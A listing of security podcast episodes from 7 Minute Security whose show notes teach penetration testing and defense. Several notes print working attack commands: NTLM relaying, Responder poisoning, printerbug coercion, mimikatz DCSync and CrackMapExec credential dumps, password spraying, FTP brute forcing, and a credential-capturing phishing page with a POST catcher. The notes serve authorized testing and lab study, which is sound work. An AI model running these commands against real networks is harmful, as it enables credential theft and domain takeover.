7 Minute Security

7MS #600: First Impressions of Using AI on Penetration Tests Dec 01, 2023

Hey friends, today I share my experience working with ChatGPT, Ollama.ai, PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called Pilgrimage from HackTheBox.

Will AI replace pentesters as we know them today? In my humble opinion: not quite yet. Check out today's episode to hear more, and please join me on Wednesday, December 6 for my Webinar on this topic with Netwrix called Hack the Hackers: Exploring ChatGPT and PentestGPT in Penetration Testing!

7MS #599: Baby's First Responsible Disclosure Nov 25, 2023

Today we talk about our first experience working through the responsible disclosure process after finding vulnerabilities in a security product. We cannot share a whole lot of details as of right now, but wanted to give you some insight into the testing/reporting process thus far, which includes the use of:

7MS #598: Hacking Billy Madison - Part 4 Nov 17, 2023

Today our good buddy Paul and I keep trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2 and 3). In today's final chapter, Paul and I:

Find Eric's secret SSH back door
Locate and decrypt a hidden file with Billy's homework
Build wordlists with cewl
Save Billy from the evil clutches of Eric Gordon!!!

7MS #597: Let's JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) with Robert McCurdy Nov 11, 2023

Today we had a blast talking with Robert McCurdy about JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy)! JAMBOREE allows you to quickly spin up a portable Git/Python/Java environment and much more! From a pentesting POV, you can whip up an Android pentesting environment, BloodHound/SharpHound combo, Burp Suite...the list goes on!

7MS #596: How to Succeed in Business Without Really Crying - Part 13 Nov 04, 2023

After about a year break (last edition of this series was in October, 2022, we're back with an updated episode of How to Succeed in Business Without Really Crying. We cover:

Why we're not planning on selling the business any time soon
Fast Google Dorks Scan
Using ProtonVPN via command line
Our pre first impressions of a pentesting SaaS tool you've almost definitely heard of

7MS #595: Choosing the Right XDR Strategy with Matt Warner of Blumira Oct 31, 2023

Today we're joined by Matt Warner of Blumira (remember him from episodes #551 and #529 and #507?) to talk about choosing the right XDR strategy! There's a lot to unpack here. Are EDR, MDR and XDR related? Can you get them all from one vendor - and should you? Do you run them on-prem, in the cloud, or both? Join us as Matt answers these questions and more!

7MS #594: Using PatchMyPC to Auto-Update Pentest Dropboxes Oct 23, 2023

Today we're talking about how you can use PatchMyPc to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!

7MS #593: Hacking Billy Madison - Part 3 Oct 15, 2023

Hey friends, today my Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2). In our journey we learned some good stuff:

Port knocking is awesome using utilities like knock:

/opt/knock/knock 10.0.7.124 1466 67 1469 1514 1981 1986

Sending emails via command line is made (fairly) easy with swaks:

swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.110.105:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"

You could also use telnet and do this command by command - see this article from Black Hills Information Security for more info.

Hyda works good for spraying FTP creds:

hydra -l user -P passlist.txt ftp://192.168.0.1

Check out my quick cheat sheet about bettercap (see episode #522) for some syntax on extracting WPA handshake data from cap files:

# ...it looks like the new standard hash type might be m22000 per this article (https://hashcat.net/forum/thread-10253.html). In that case, here's what I did on the pcap itself to get it ready for hashcat: sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap # Then crack with hashcat! sudo /path/to/hashcat -m22000 readytocrack.hc2000 wordlist.txt

7MS #592: 7 Steps to Recover Your Hacked Facebook Account Oct 06, 2023

Today we're talking about 7 steps you can take to (hopefully) reclaim a hacked Facebook account. The key steps are:

Ask Facebook for help (good luck with that)
Put out an SOS on your socials
Flag down the FBI
Call the cops!
Grumble to your attorney general
Have patience
Lock it down (once you get the account back)!

Also, I have to say that this article was a fantastic resource in helping me create the outline above.

7MS #591: Tales of Pentest Pwnage - Part 52 Sep 29, 2023

Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here's my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller (see https://7ms.us for full show notes).

7MS #590: Hacking Billy Madison - Part 2 Sep 22, 2023

Today my Paul and I continued hacking Billy Madison (see part one here) and learned some interesting things:

You can fuzz a URL with a specific file type using a format like this:

wfuzz -c -z file,/root/Desktop/wordlist.txt --hc 404 http://x.x.x.x/FUZZ.cap

To rip .cap files apart and make them "pretty" you can use tpick:

tcpick -C -yP -r tcp_dump.pcap

Or tcpflow:

apt install tcpflow tcpflow -r

To do port knocking, you can use the knock utility:

sudo git clone https://github.com/grongor/knock /opt/knock knock 1.2.3.4 21 23 25 69 444 7777777

7MS #589: Tales of Pentest Pwnage - Part 51 Sep 15, 2023

In today's tale of pentest pwnage we talk about:

The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure
Copying files via WinRM when copying over SMB is blocked:

$sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential *

...then provide your creds...and then:

copy-item c:\superimportantfile.doc -destination c:\my-local-hard-drive\superimportantfile.doc -fromsession $sess

If you come across PowerShell code that crafts a secure string credential, you may able to decrypt the password variable with:

[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MyVarIWantToDecryptGoesHere))

7MS #588: Becoming a Sysmon Sensei with Amanda Berlin Sep 08, 2023

Today Amanda Berlin from Blumira teaches us how to unlock the power of Sysmon so we can gain insight into the good, bad and ugly things happening on our corporate endpoints! Key takeaways:

Sysmon turns your windows logging up to 11, and pairs well with a config file like this one or this one.
Careful if you are are running sysmon on non-SSD drives - the intense number of writes might bring that disk to its knees.
Just getting started logging all the things with sysmon? Why not pump those logs into a free logging/alerting system like Wazuh?
I think it was SolarWinds log collector I was trying to think of while recording the show, not CloudTrail.

7MS #587: Hacking Billy Madison Sep 01, 2023

Today my pal Paul from Project7 and I hack the heck out of Billy Madison a vulnerable virtual machine that is celebrating its 7th anniversary this month!

7MS #586: DIY Pentest Dropbox Tips – Part 8 Aug 25, 2023

Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on building your Kali preseed file, but essentially the last line in my file runs a kali.sh script to download/install all the pentest tools I want. The "missing link" part is I figured out how to get Kali to reboot and then run a script one time to complete all the post-install stuff. So at the bottom of my kali.sh is this:

sudo wget https://somesite/kali-docker.sh -O /opt/kali-docker.sh sudo chmod +x /opt/kali-docker.sh sudo touch /flag sudo wget https://somesite/docker.service -O /etc/systemd/system/mydocker.service sudo systemctl daemon-reload sudo systemctl enable mydocker.service

The contents of docker.service are:

[Unit] Description=Docker install [Service] Type=simple ExecStart=/opt/kali-docker.sh [Install] WantedBy=multi-user.target

The beginning and end snippets of kali-docker.sh are:

#!/bin/bash flag_file="/flag" if [ -e "$flag_file" ]; then # get bbot sudo docker run -it blacklanternsecurity/bbot:stable --help # Do a bunch of other install things... rm "$flag_file" else echo "Script already ran before. Exiting" fi

So essentially the work flow is: kali.sh runs, downloads and installs kali-docker.sh, and also installs a service that runs kali-docker.sh on each reboot. But when kali-docker.sh runs, it checks for the presence of a file called /flag. If /flag exists, all the post-install commands will run. If it does not exist, those commands won't run. Simple, yet genius I think!

7MS #585: DIY Pentest Dropbox Tips – Part 7 Aug 18, 2023

Hey friends, today I'm super excited to share I found the missing link! Specifically, the missing piece that now allows me to create fully automated Windows 10 installs that serve as virtual pentest jumpboxes. Here are the high points:

When your deployment script is finishing and you need the system to reboot and run some final commands, temporarily add your account as an auto-login account like so:

new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name AutoAdminLogon -value 1 -force new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name DefaultUserName -value "your-local-user" -force new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name DefaultPassword -value "your-password" -force

Then tell Windows to run your final script one time after automatically logging in as your-local-user:

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v MyRunOnceKey /t REG_SZ /d "c:\your-final-script.bat"

Finally, make sure your your-final-script.bat deletes the auto-login creds:

reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v DefaultUserName /f reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v DefaultPassword /f reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v AutoAdminLogon /f

7MS #584: Tales of Pentest Pwnage - Part 50 Aug 11, 2023

In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.

7MS #583: Cred-Capturing Phishing with Caddy Server Aug 04, 2023

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y

Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile:

domain.com

Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal:

Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; }

User Name:

Password:

Unauthorized use is prohibited!

This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)

If you don't have Flask installed, do this:

sudo apt install python3-pip -y sudo pip install Flask

Run this file in one session, then in your index.html file make a small tweak in the form action directive:

Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

7MS #582: Using Wazuh as a SIEM for Work and Home Jul 31, 2023

Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck.

This one-liner will literally get Wazuh installed in about 5 minutes:

curl -sO https://packages.wazuh.com/4.4/wazuh-install.sh && sudo bash ./wazuh-install.sh -a

P.S. if you accidentally close your command window before writing down the admin password (like I did), you can use this command to retrieve it:

sudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt

Once Wazuh is installed, I recommend going to Management > Configuration > Edit Configuration, look for a section that starts with and change no to yes.

Also, before you start deploying agents, I recommend making some groups for them, which I believe has to be done at the command line:

/var/ossec/bin/agent_groups -a -g windows-boxes -q /var/ossec/bin/agent_groups -a -g linux -q

From there you should be ready to start rockin' some agent installs. Have fun!

7MS #581: Tales of Pentest Pwnage - Part 49 Jul 21, 2023

Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links to make the magic happen:

7MS #580: Hacking Tommy Callahan - Part 3 Jul 17, 2023

Today me and my pal Paul from Project7 did a live hacking session and finally got the Callahan Auto brake pad Web app back online! Hopefully you enjoyed this hacking series. The feedback has been great, so we may have to take a crack at Billy in the near future as well.

7MS #579: Hacking Tommy Callahan - Part 2 Jul 07, 2023

Hey friends, today we're continuing our series on pwning the Tommy Boy VM on VulnHub VM! P.S. did you miss part one? Check it out on YouTube. Joe "The Machine" Skeen and I had a blast poking and prodding at the VM in hopes to fix the broken Callahan Auto brake-ordering Web app. Some tips/tricks we cover:

It's always a good idea to look at a site's robots.txt file
crunch is awesome for making wordlists
fcrackzip is rad for cracking encrypted zip files
dirbuster works well for busting into hidden files and subfolders
exiftool works well to pull metadata out of images

7MS #578: Interview with Mike Toole of Blumira Jun 30, 2023

Today I'm excited to share a featured interview with our new friend Mike Toole of Blumira. We talk about all things EDR, including:

How does it differ from something like Windows Defender?
What things do I need to keep in mind if I'm in the market for an EDR purchase?
Is Mac EDR any good?
How do attackers bypass EDR?
Will AI create industructible malware, take over the human race and then use our bodies for batteries?

7MS #577: Tales of Pentest Pwnage - Part 48 Jun 16, 2023

Holy schnikes - this episode is actually 7 minutes long! What a concept!

Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including:

Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities!
Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!

7MS #575: Annoying Attackers with ADHD - Part 2 Jun 09, 2023

Hey friends! Today we're taking a second look at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! The tools covered today include:

PHP-HTTP-TARPIT

A tool to confuse and waste bot/scanner/hacker time. Grab it here and check out our setup instructions:

sudo git clone https://github.com/msigley/PHP-HTTP-Tarpit.git /opt/tarpit cd /opt/tarpit sudo mv la_brea.php /var/www/html/index.php cd /var/www/html/ # Delete the default HTMLM files that are there sudo rm DEFAULT .HTML FILES # Start/restart apache2 sudo service apache2 stop sudo service apache2 start # It's easier to see PHP-HTTP-TARPIT in action from command line: curl -i http://IP.RUNNING.THE.TARPIT Spidertrap

This tool tangles Web visitors in a never-ending maze of pages with links!

sudo git clone https://github.com/adhdproject/spidertrap.git /opt/spidertrap cd /opt/spidertrap # Open spidertrap.py and change listening port from 8080 to 80 sudo nano spidertrap.py # Run the trap sudo python3 spidertrap.py Weblabyrinth

This tool presents visitors with a blurb of text from Alice in Wonderland. That text has links that takes them to...you guessed it...more Alice in Wonderland excerpts! I especially like that if you visit ANY folder or link inside Weblabyrinth, content is served (return code 200 for anything and everything).

I had problems getting this running on a fresh Kali box so it's probably better to run right off the ADHD distro using their instructions.

7MS #574: Annoying Attackers with ADHD Jun 02, 2023

Hey friends! Today we're looking at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! ADHD gets you up and running with these tools quickly, but the distro hasn't been updated in a while, so I switched to a vanilla Kali system and setup a cowrie SSH honeypot as follows (see 7ms.us for full list of commands).

7MS #573: Securing Your Mental Health - Part 4 May 26, 2023

Today we're talking about reducing anxiety by hacking your mental health with these tips:

Using personal automation to text people important reminders
Using Remind to create a personal communication "class" with your family members
Using Smartsheet (not a sponsor) to create daily email "blasts" to yourself about all the various project todos you need to tackle

7MS #572: Protecting Your Domain Controllers with LDAP Firewall May 19, 2023

Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.

7MS #571: Simple Ways to Test Your SIEM - Part 2 May 12, 2023

Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM. This is something I covered a while back on the podcast, but punched up the content a bit and built a refreshed a two-part GitHub gist that covers:

Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you
All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!

7MS #570: How to Build a Vulnerable Pentest Lab - Part 4 May 05, 2023

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In today's episode we staged an NTLM relay attack using a vulnerable SQL server.

First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled:

cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt

Then we setup lsarelayx in one window:

lsarelayx --host=localhost

And in a second window we ran ntlmrelayx.py:

python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM

Finally, in a third window we triggered authentication from the vulnerable SQL server:

Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS

Boom! Watch the local usernames and hashes fall out of the victim system.

We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this:

victim1 victim2 victim3

Then we tweaked the ntlmrelayx command slightly:

python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt

Interestingly(?) only victim2 was attacked.

Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay:

python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks

Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server.

TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.

7MS #569: Interview with Jim Simpson of Blumira Apr 28, 2023

Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira. Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared love for helping SMBs be more secure, so it was great to chat with Jim about the IT/security challenges faced by SMBs, and what we can do make security more simple and accessible for them.

7MS #568: Lets Play With the 2023 Local Administrator Password Solution! Apr 21, 2023

Hey friends, today we're playing with the new (April 2023) version of Local Administrator Password Solution (LAPS). Now it's baked right into PowerShell and the AD Users and Tools console. It's awesome, it's a necessary blue team control for any size company, and you should basically stop reading this and install LAPS now.

7MS #567: How to Build an Intentionally Vulnerable SQL Server Apr 14, 2023

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:

Download SQL Server here
Install SQL via config .ini file
Or, install SQL via pure command line
Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:

setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users"

Run PowerUpSQL to find vulnerable SQL servers:

$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}

Audit the discovered SQL servers:

Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose

Fire off stored procedures to catch hashes!

Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX

7MS #566: Tales of Pentest Pwnage - Part 47 Mar 31, 2023

Ok, I know we say this every time, but it is true this time yet again: this is our favorite tale of pentest pwnage. It involves a path to DA we've never tried before, and introduced us to a new trick that one of our favorite old tools can do!

7MS #565: How to Simulate Ransomware with a Monkey Mar 24, 2023

Hey friends, today we talk through how to simulate ransomware (in a test environment!) using Infection Monkey. It's a cool way to show your team and execs just how quick and deadly an infection can be to your business. You can feed the monkey a list of usernames and passwords/hashes to use for lateral movement, test network segmentation, set a UNC path of files to actually encrypt (careful - run in a test lab - NOT in prod!) and more!

7MS #564: First Impressions of OVHcloud Hosted vCenter Mar 17, 2023

Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR:

It runs on vCenter, my first and only virtualization love!
Unlimited VM "powered on" time and unlimited bandwidth
Intergration with PowerShell so you can run a single script to "heal" your environment to a gold image
Easy integration with pfSense to be able to manage the firewall and internal/external IPs
Price comparable to what we're paying now in Azure land

7MS #563: Cracking and Mapping and Execing with CrackMapExec - Part 2 Mar 10, 2023

Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover:

# Enumerate where your user has local admin rights: cme smb x.x.x.x/24 -u user -p password # Set wdigest flag: cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable # Dump AD creds: cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled # Clean up AD dump output: cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort # Check ms-ds-machineaccountquota: cme ldap x.x.x.x -u user -p password -M maq # Check for Active Directory Certificate Services: cme ldap x.x.x.x -u user -p password -M adcs # Pull all AD user descriptions: cme ldap x.x.x.x -u user -p password -M get-desc-users # Pull all AD user descriptions down to a file and search for users with "pass" in description: cme ldap x.x.x.x -u user -p password -M user-desc # CrackMapExec database (CME) ## Clear database sudo rm -r ~/.cme ## Handy commands inside the cmedb prompt: hosts shares creds export shares detailed shares.csv export creds detailed creds.txt

7MS #562: Cracking and Mapping and Execing with CrackMapExec Mar 03, 2023

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

# General enumeration to see if your account works, and where: cme smb x.x.x.x -u username -p pass # Check if print services are enabled: cme smb x.x.x.x -u username -p pass -M spooler # Check for the nopac vuln: cme smb x.x.x.x -u username -p pass -M nopac # Find GP passwords: cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password # Get list of targets with smb signing: cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt # Set wdigest flag: cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable # Dump creds/hashes: cme smb x.x.x.x -u username -p pass -M lsassy # Do pass the hash attacks cme smb x.x.x.x -u username -H HASH # Dump SAM database: cme smb x.x.x.x -u username -p pass --sam # Enumerate SMB shares cme smb x.x.x.x -u username -p pass --shares # Conduct slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 # Cleanup from slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

7MS #561: Interview with Chris Furner of Blumira Feb 24, 2023

Today I sat down with Chris Furner of Blumira to talk about all things cyber insurance. Many of 7MinSec's clients are renewing their policies this time of year, and many are looking into policies for the first time. Naturally, there are a ton of questions to ask and things to think about to make good coverage decisions for your business:

How do I get started in looking for a cyber policy - with my general liability insurer? Or are there companies that specialize just in cyber insurance?
How do I make sure I have the appropriate levels of coverage?
What are basic things I can do from a security standpoint that pretty much any insurer is going to expect me to do?

Enjoy the interview, where we cover these questions - and more! And be sure to also check out Blumira's whitepaper on this topic called The State of Cyber Insurance.

7MS #560: 7MOOCH - Dolphin Rides Are Done Dude Feb 17, 2023

Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"

7MS: #559: Tales of Pentest Pwnage - Part 46 Feb 10, 2023

Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):

Change the Responder.conf file like so:

; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788

Run Responder with --disable-ess flag

sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess

Use printerbug to coax authentication from a domain controller:

sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX

Convert hash to make it easier to crack!

sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!

Now you can do a Rubeus asktgt with the DC hash:

rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap

Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!

rubeus.exe ptt /ticket:TICKET GOES HERE

Use mimikatz to dump all hashes!

mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

7MS #558: How to Build a Vulnerable Pentest Lab - Part 2 Feb 07, 2023

Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going:

Use Youzer to import a bunch of bogus users into your Active Directory:

sudo python ./youzer.py --generate --generate_length 20 --ou "ou=Contractors,dc=brifly,dc=us" --domain brifly.us --users 1000 --output lusers.csv

Make a Kerberoastable user:

New-AdUser -Name "Kerba Roastable" -GivenName "Kerba" -Surname "Roastable" -SamAccountName Kerba -Description "ROASTED!" -Path "OU=Contractors,DC=brifly,DC=us" -AccountPassword (ConvertTo-SecureString "Password1" -AsPlainText -force) -passThru -PasswordNeverExpires $true enable-adaccount Kerba setspn -a IIS_SITE/brifly-dc01.brily.us:77777 briflyus\kerba

7MS #557: Better Passive Network Visibility Using Teleseer Jan 27, 2023

Today we're talking about Teleseer, which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your network and - from a pentester's perspective - delicious vulnerabilities that may lie within!

7MS #556: How to Build a Vulnerable Pentest Lab Jan 20, 2023

Today's episode is brought to us by our friends at Blumira!

Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically:

Spinning up a domain controller with a few lines of PowerShell
Installing Active Directory Domain Services
Setting up an intentionally cruddy password policy
Baking in the MS14-025 vulnerability

P.S. if you're looking for a more automated/push-button solution to get up and going with a lab to play in, check out some of these options:

https://github.com/Orange-Cyberdefense/GOAD https://automatedlab.org/en/latest/ https://github.com/microsoft/MSLab https://github.com/davidprowe/BadBlood https://github.com/cliffe/secgen https://github.com/WazeHell/vulnerable-AD

7MS #555: Light Pentest eBook 1.1 Release Jan 13, 2023

Today we're releasing version 1.1 of our Light Pentest eBook. Changes discussed in today's episode (and shown live in the accompanying YouTube video) include:

Some typos and bug fixes
A new section on finding systems with unconstrained delegation and exploiting them
A new section on finding easily pwnable passwords via password spraying
A new section relaying credentials with MITM6 (be careful using some of its options - read this
New ways (and some words of warning) to dump hashes from Active Directory

7MS #554: Simple Ways to Test Your SIEM Jan 06, 2023

Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered:

Port scanning nmap 10.0.7.0/24 - basic nmap scan massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports!

Password spraying Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt

Kerberoasting and ASREPRoasting rubeus.exe kerberoast /simple rubeus asreproast /nowrap

Key group membership changes net group "GROUP NAME" user-to-add-to-a-group /add

Dump Active Directory hashes cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q

SMB share hunting Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares

7MS #553: The Artificial Intelligence Throat Burn Episode Dec 30, 2022

Hey friends, today's episode is hosted by an AI from Murf.ai because I suffered a throat injury over the holidays and spent Christmas morning in the emergency room! TLDL: I'm fine, but if you want the (sort of) gory details and an update on my condition after my ENT appointment, check out today's episode. Otherwise, we'll see you next week when our regularly scheduled security content continues in 2023.

Merry belated Christmas, happy holidays and happiest of new year to you and yours!

7MS #552: Tales of Pentest Pwnage - Part 45 Dec 24, 2022

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Today's tale of pentest pwnage covers some of the following attacks/tools:

Teleseer for packet capture visualizations on steroids!
Copernic Desktop Search
Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it
I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack
Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)

7MS #551: Interview with Matt Warner of Blumira Dec 16, 2022

Today we welcome our pal Matthew Warner (CTO and co-founder of Blumira) back to the show for a third time (his first appearance was #507 and second was #529).

I complained to Matt about how so many SIEM/SOC solutions don't catch early warning signs of evil things lurking in customer networks. Specifically, I whined about 7 specific, oft-missed attacks like port scanning, Kerberoasting, ASREPRoasting, password spraying and more. (Shameless self-promotion opportunity: I will be discussing these attacks on an upcoming livestream on December 29).

Matt dives into each of these attacks and shares some fantastic insights into what they look like from a defensive perspective, and also offers practical strategies and tools for detecting them!

Note: during the discussion, Matt points out a lot of important Active Directory groups to keep an eye on from a membership point of view. Those groups include:

ASAAdmins
Account Operators
Administrators
Administrators
Backup Operators
Cert Publishers
Certificate Service DCOM
DHCP Administrators
Debugger Users
DnsAdmins
Domain Admins
Enterprise Admins
Enterprise Admins
Event Log Readers
ExchangeAdmins
Group Policy Creator Owners
Hyper-V Administrators
IIS_IUSRS
IT Compliance and Security Admins
Incoming Forest Trust Builders
MacAdmins
Network Configuration Operators
Schema Admins
Server Operators
ServerAdmins
SourceFireAdmins
WinRMRemoteWMIUsers
WorkstationAdmins
vCenterAdmins

7MS #550: Tales of Pentest Fail - Part 5 Dec 09, 2022

This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

Hey friends, today's episode is extra special because it's our first episode we've ever done live and with video(!). Will we do it again? Who knows. But anyway, we had a fun time talking about things that have gone not so well during pentesting lately, specifically:

Things we keep getting caught doing (and some potential ways to not get caught!
- Responder
- SharpHound
- CrackMapExec - specifically running -x or -X to enumerate systems
- PowerHuntShares
